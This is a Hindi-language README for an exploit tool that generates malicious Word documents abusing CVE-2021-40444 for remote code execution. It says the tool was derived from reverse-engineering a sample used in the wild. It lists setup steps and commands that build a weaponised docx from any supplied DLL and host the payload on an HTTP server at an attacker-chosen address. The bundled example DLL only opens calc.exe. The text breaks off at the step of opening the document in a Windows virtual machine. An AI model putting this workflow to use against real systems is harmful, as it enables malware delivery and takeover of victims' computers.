
दुर्भावनापूर्ण DOCX दस्तावेज़ उत्पन्न करता है जो CVE-2021-40444 (Microsoft Office Word RCE) का शोषण करते हैं, पेलोड वितरण के लिए एक एकीकृत HTTP सर्वर के साथ, जो वास्तविक दुनिया के नमूनों के रिवर्स-इंजीनियरिंग पर आधारित है।
CVE-2021-40444 (Microsoft Office Word रिमोट कोड निष्पादन) का शोषण करने के लिए दुर्भावनापूर्ण docx जनरेटर
इस स्क्रिप्ट का निर्माण जंगल में उपयोग किए गए नमूने पर कुछ रिवर्स इंजीनियरिंग पर आधारित है: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx फ़ाइल)
पहले lcab इंस्टॉल करें (sudo apt-get install lcab)
मैन्युअल पुनरुत्पादन चरणों के लिए REPRODUCE.md देखें
यदि आपका जनरेट किया गया cab काम नहीं कर रहा है, तो exploit.html URL को calc.cab पर इंगित करने का प्रयास करें
पहले एक DLL दिए जाने पर एक दुर्भावनापूर्ण docx दस्तावेज़ जनरेट करें, आप test/calc.dll पर उपलब्ध DLL का उपयोग कर सकते हैं जो system() कॉल से calc.exe पॉप करता है
python3 exploit.py generate test/calc.dll http://<SRV IP>

एक बार जब आप दुर्भावनापूर्ण docx जनरेट कर लें (out/ पर होगा) तो आप सर्वर सेटअप कर सकते हैं:
sudo python3 exploit.py host 80

अंत में Windows वर्चुअल मशीन में docx आज़माएं:
